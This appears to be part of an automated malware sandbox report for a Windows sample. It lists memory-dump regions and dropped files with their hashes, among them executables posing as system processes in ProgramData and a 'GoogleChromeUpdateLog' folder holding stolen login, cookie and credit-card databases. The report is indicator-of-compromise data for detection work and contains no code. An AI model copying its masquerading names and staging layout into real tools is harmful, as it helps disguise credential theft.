memory/2428-108-0x00007FFCA7600000-0x00007FFCA7623000-memory.dmp

memory/2428-107-0x00007FFCAE650000-0x00007FFCAE669000-memory.dmp

memory/2428-106-0x00007FFCA9810000-0x00007FFCA983D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_bz2.pyd

MD5 20a7ecfe1e59721e53aebeb441a05932
SHA1 a91c81b0394d32470e9beff43b4faa4aacd42573
SHA256 7ebbe24da78b652a1b6fe77b955507b1daff6af7ff7e5c3fa5ac71190bde3da8
SHA512 99e5d877d34ebaaaeb281c86af3fff9d54333bd0617f1366e3b4822d33e23586ef9b11f4f7dd7e1e4a314c7a881f33123735294fe8af3a136cd10f80a9b8d902

C:\Users\Admin\AppData\Local\Temp\_MEI28802\_decimal.pyd

MD5 d0231f126902db68d7f6ca1652b222c0
SHA1 70e79674d0084c106e246474c4fb112e9c5578eb
SHA256 69876f825678b717c51b7e7e480de19499d972cb1e98bbfd307e53ee5bace351
SHA512 b6b6bfd5fde200a9f45aeb7f6f845eac916feeef2e3fca54e4652e1f19d66ae9817f1625ce0ed79d62e504377011ce23fd95a407fbdbaa6911a09e48b5ef4179

C:\Users\Admin\AppData\Local\Temp\_MEI28802\unicodedata.pyd

MD5 af87b4aa3862a59d74ff91be300ee9e3
SHA1 e5bfd29f92c28afa79a02dc97a26ed47e4f199b4
SHA256 fac71c7622957fe0773214c7432364d7fc39c5e12250ff9eaaeea4d897564dc7
SHA512 1fb0b8100dffd18c433c4aa97a4f2da76ff6e62e2ef2139edc4f98603ba0bb1c27b310b187b5070cf4e892ffc2d09661a6914defa4509c99b60bcbb50f70f4a0

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_bz2.pyd

MD5 86d1b2a9070cd7d52124126a357ff067
SHA1 18e30446fe51ced706f62c3544a8c8fdc08de503
SHA256 62173a8fadd4bf4dd71ab89ea718754aa31620244372f0c5bbbae102e641a60e
SHA512 7db4b7e0c518a02ae901f4b24e3860122acc67e38e73f98f993fe99eb20bb3aa539db1ed40e63d6021861b54f34a5f5a364907ffd7da182adea68bbdd5c2b535

C:\Users\Admin\AppData\Local\Temp\_MEI44802\unicodedata.pyd

MD5 81d62ad36cbddb4e57a91018f3c0816e
SHA1 fe4a4fc35df240b50db22b35824e4826059a807b
SHA256 1fb2d66c056f69e8bbdd8c6c910e72697874dae680264f8fb4b4df19af98aa2e
SHA512 7d15d741378e671591356dfaad4e1e03d3f5456cbdf87579b61d02a4a52ab9b6ecbffad3274cede8c876ea19eaeb8ba4372ad5986744d430a29f50b9caffb75d

C:\Users\Admin\AppData\Local\Temp\_MEI28802\base_library.zip

MD5 f3bdb92e5c64ec84c2fc7169a72aa1ed
SHA1 45b1aadc7b3ef8bda3d6dda334844571c5e8f3fa
SHA256 a2931aa7f395ad28701de71f582032f2ff1fd1166277f22749627889496b4861
SHA512 e96f10e532e138f6598a9cc1ca2e1b779c9d02395c1ab5996fc38c8dd0b71456a40d8590ce427d4bbdd1812c7b730d2de7f4df186509e461550ccf26e0b7f3db

C:\Users\Admin\AppData\Local\Temp\_MEI44802\select.pyd

MD5 a653f35d05d2f6debc5d34daddd3dfa1
SHA1 1a2ceec28ea44388f412420425665c3781af2435
SHA256 db85f2f94d4994283e1055057372594538ae11020389d966e45607413851d9e9
SHA512 5aede99c3be25b1a962261b183ae7a7fb92cb0cb866065dc9cd7bb5ff6f41cc8813d2cc9de54670a27b3ad07a33b833eaa95a5b46dad7763ca97dfa0c1ce54c9

C:\Users\Admin\AppData\Local\Temp\_MEI44802\libcrypto-1_1.dll

MD5 9d7a0c99256c50afd5b0560ba2548930
SHA1 76bd9f13597a46f5283aa35c30b53c21976d0824
SHA256 9b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939
SHA512 cb39aa99b9d98c735fdacf1c5ed68a4d09d11f30262b91f6aa48c3f8520eff95e499400d0ce7e280ca7a90ff6d7141d2d893ef0b33a8803a1cadb28ba9a9e3e2

C:\Users\Admin\AppData\Local\Temp\_MEI44802\base_library.zip

MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

memory/2428-138-0x00007FFC9EDE0000-0x00007FFC9EEAD000-memory.dmp

memory/2428-137-0x00007FFC9D610000-0x00007FFC9DB32000-memory.dmp

memory/2428-148-0x00007FFC9EF10000-0x00007FFC9F02C000-memory.dmp

memory/2428-136-0x00007FFCA5200000-0x00007FFCA5233000-memory.dmp

memory/2428-134-0x00007FFCAE600000-0x00007FFCAE619000-memory.dmp

memory/2428-133-0x00007FFC9F0F0000-0x00007FFC9F267000-memory.dmp

C:\ProgramData\main.exe

MD5 3d3c49dd5d13a242b436e0a065cd6837
SHA1 e38a773ffa08452c449ca5a880d89cfad24b6f1b
SHA256 e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
SHA512 dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

memory/2428-132-0x00007FFCA7600000-0x00007FFCA7623000-memory.dmp

memory/2428-128-0x00007FFCAE620000-0x00007FFCAE643000-memory.dmp

C:\ProgramData\crss.exe

MD5 f92152107324281ce753765611679657
SHA1 978022d968273c42ab333d9be9fbf35fbf6403b5
SHA256 3c7a298891ea92996205cd6625b17c6d6308272d21d298d08be87455ff06970b
SHA512 43697c4649e743d3eda775d132407e979fbdf3c8239204333a233b301e467a29646abc50f20c88559a6c13b95ce9692134425acc5a8afa6afcd5134ce46852ab

memory/2428-172-0x00007FFCA5200000-0x00007FFCA5233000-memory.dmp

C:\ProgramData\svchost.exe

MD5 45c59202dce8ed255b4dbd8ba74c630f
SHA1 60872781ed51d9bc22a36943da5f7be42c304130
SHA256 d07c47f759245d34a5b94786637c3d2424c7e3f3dea3d738d95bf4721dbf3b16
SHA512 fff5b16ae38681ed56782c0f0423560dab45065685d7272424206f43c80486318180aa22d66bd197c8c530e4c24dbaaaa020beb76b619dc767ee59faa27e23ed

C:\ProgramData\setup.exe

MD5 1274cbcd6329098f79a3be6d76ab8b97
SHA1 53c870d62dcd6154052445dc03888cdc6cffd370
SHA256 bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278
SHA512 a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

memory/2868-298-0x0000024969720000-0x0000024969796000-memory.dmp

memory/2356-299-0x0000019C7BA00000-0x0000019C7BA22000-memory.dmp

memory/2428-284-0x00007FFC9EDE0000-0x00007FFC9EEAD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4pv5e4f.fll.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2428-310-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp

memory/2428-325-0x00007FFC9EF10000-0x00007FFC9F02C000-memory.dmp

memory/2428-312-0x00007FFCAE620000-0x00007FFCAE643000-memory.dmp

memory/2428-283-0x00007FFC9D610000-0x00007FFC9DB32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

MD5 65ccd6ecb99899083d43f7c24eb8f869
SHA1 27037a9470cc5ed177c0b6688495f3a51996a023
SHA256 aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

memory/2868-167-0x0000024966D00000-0x00000249672A0000-memory.dmp

memory/2428-127-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp

memory/2428-364-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp

memory/5248-379-0x00007FF757490000-0x00007FF7579F5000-memory.dmp

memory/2868-389-0x0000024968E80000-0x0000024968E9E000-memory.dmp

memory/5728-408-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-416-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-414-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-412-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-410-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-402-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-400-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-399-0x000001EF7FFE0000-0x000001EF7FFE1000-memory.dmp

memory/5728-406-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/5728-404-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp

memory/2856-1692-0x00000000005A0000-0x0000000000932000-memory.dmp

memory/5808-1698-0x00000137799B0000-0x00000137799B8000-memory.dmp

memory/2856-1709-0x000000001C220000-0x000000001C246000-memory.dmp

memory/2856-1715-0x0000000001020000-0x000000000102E000-memory.dmp

memory/2856-1717-0x000000001B670000-0x000000001B68C000-memory.dmp

memory/2856-1722-0x000000001C2A0000-0x000000001C2F0000-memory.dmp

memory/2856-1724-0x0000000001040000-0x0000000001050000-memory.dmp

memory/2856-1729-0x000000001C250000-0x000000001C268000-memory.dmp

memory/2856-1731-0x000000001B650000-0x000000001B660000-memory.dmp

memory/2856-1751-0x000000001B660000-0x000000001B670000-memory.dmp

memory/2856-1753-0x000000001C270000-0x000000001C27E000-memory.dmp

C:\ProgramData\шева.txt

MD5 17bcf11dc5f1fa6c48a1a856a72f1119
SHA1 873ec0cbd312762df3510b8cccf260dc0a23d709
SHA256 a7bf504871a46343c2feab9d923e01b9dca4e980b2e122ad55fd4dbb3f6c16d9
SHA512 9c12db4c6a105e767ff27048d2f8f19de5c9721ce6503dbb497aedcc1fc8b910a6fa43ec987fecd26794aff7440cb984744698fec5741dd73400a299dc3b2a25

memory/2856-1758-0x000000001C280000-0x000000001C28E000-memory.dmp

memory/2856-1760-0x000000001C310000-0x000000001C322000-memory.dmp

memory/2856-1762-0x000000001C290000-0x000000001C2A0000-memory.dmp

memory/2856-1764-0x000000001C330000-0x000000001C346000-memory.dmp

memory/2856-1766-0x000000001C350000-0x000000001C362000-memory.dmp

memory/2856-2079-0x000000001C8A0000-0x000000001CDC8000-memory.dmp

memory/2856-2099-0x000000001C2F0000-0x000000001C2FE000-memory.dmp

memory/2856-2123-0x000000001C300000-0x000000001C310000-memory.dmp

memory/2856-2133-0x000000001C3A0000-0x000000001C3B0000-memory.dmp

memory/2856-2143-0x000000001C410000-0x000000001C46A000-memory.dmp

memory/2856-2157-0x000000001C3B0000-0x000000001C3BE000-memory.dmp

memory/2856-2162-0x000000001C3C0000-0x000000001C3D0000-memory.dmp

memory/2856-2175-0x000000001C3D0000-0x000000001C3DE000-memory.dmp

memory/2856-2183-0x000000001C470000-0x000000001C488000-memory.dmp

memory/2856-2186-0x000000001C620000-0x000000001C66E000-memory.dmp

C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe

MD5 5fe249bbcc644c6f155d86e8b3cc1e12
SHA1 f5c550ab2576d2daeff9cb72a4d41d1bcfee0e6d
SHA256 9308b0ce7206c60517db7207c488b4fa1cc313413e5378d8bac63b22cabcdd80
SHA512 b210c6b5d8db31d8f4ea82a79fe4679ced289636570e3fd72a45c488fd2cd75ed74677d723c1bfa67432e46e71901cb6551595e1053448c2f5e297829a6e1b39

memory/6504-2352-0x000002AB8C550000-0x000002AB8CAF0000-memory.dmp

memory/6504-2629-0x000002ABA7E70000-0x000002ABA7E7A000-memory.dmp

memory/6504-2630-0x000002ABA7EF0000-0x000002ABA7F5A000-memory.dmp

memory/6504-2673-0x000002ABA81E0000-0x000002ABA821A000-memory.dmp

memory/6504-2674-0x000002ABA81A0000-0x000002ABA81C6000-memory.dmp

memory/6504-2681-0x000002ABA8220000-0x000002ABA82D2000-memory.dmp

memory/6504-2703-0x000002ABA8F70000-0x000002ABA929E000-memory.dmp

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

memory/6504-2729-0x000002ABA92A0000-0x000002ABA92B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\login_data_db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 a1eeb9d95adbb08fa316226b55e4f278
SHA1 b36e8529ac3f2907750b4fea7037b147fe1061a6
SHA256 2281f98b872ab5ad2d83a055f3802cbac4839f96584d27ea1fc3060428760ba7
SHA512 f26de5333cf4eaa19deb836db18a4303a8897bf88bf98bb78c6a6800badbaa7ab6aeb6444bbbe0e972a5332670bdbb474565da351f3b912449917be21af0afb8

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\cookies_db

MD5 17141355c3716c4dbbdf5d4e61c3a8ef
SHA1 8f90ca8eb5296ff1564d8dc6b6a693e977d998d4
SHA256 86410035eef0cfc78737f7b84a8d287dbca5667aadeabf2e2f9d65c82b7bb604
SHA512 eae25322290fc6325dce38f841cbf86ec7beba242111d8317c1748ea363007451b78fcaff5b7682043e0c751c58d60378ee5a604db2821a465a3b56d788a4cd6

memory/2468-2807-0x00000225748C0000-0x00000225748DC000-memory.dmp

memory/2468-2811-0x00000225748E0000-0x0000022574995000-memory.dmp

memory/2468-2828-0x00000225748B0000-0x00000225748BA000-memory.dmp

memory/2468-2840-0x0000022574B00000-0x0000022574B1C000-memory.dmp

memory/6632-2875-0x00000000008E0000-0x0000000000C72000-memory.dmp

memory/2468-2891-0x0000022574AE0000-0x0000022574AEA000-memory.dmp

memory/2468-2895-0x0000022574B40000-0x0000022574B5A000-memory.dmp

memory/2468-2896-0x0000022574AF0000-0x0000022574AF8000-memory.dmp

memory/2468-2897-0x0000022574B20000-0x0000022574B26000-memory.dmp

memory/2468-2898-0x0000022574B30000-0x0000022574B3A000-memory.dmp

memory/2428-3171-0x00007FFCAE620000-0x00007FFCAE643000-memory.dmp

memory/2428-3170-0x00007FFCB5C50000-0x00007FFCB5C5F000-memory.dmp

memory/2428-3179-0x00007FFCA5200000-0x00007FFCA5233000-memory.dmp

memory/2428-3178-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp

memory/2428-3177-0x00007FFCAE600000-0x00007FFCAE619000-memory.dmp

memory/2428-3184-0x00007FFC9EF10000-0x00007FFC9F02C000-memory.dmp

memory/2428-3183-0x00007FFCAE820000-0x00007FFCAE82D000-memory.dmp

memory/2428-3182-0x00007FFCADC50000-0x00007FFCADC64000-memory.dmp

memory/2428-3181-0x00007FFC9EDE0000-0x00007FFC9EEAD000-memory.dmp

memory/2428-3180-0x00007FFC9D610000-0x00007FFC9DB32000-memory.dmp

memory/2428-3176-0x00007FFC9F0F0000-0x00007FFC9F267000-memory.dmp

memory/2428-3175-0x00007FFCA7600000-0x00007FFCA7623000-memory.dmp

memory/2428-3174-0x00007FFCAE650000-0x00007FFCAE669000-memory.dmp

memory/2428-3173-0x00007FFCA9810000-0x00007FFCA983D000-memory.dmp

memory/2428-3172-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp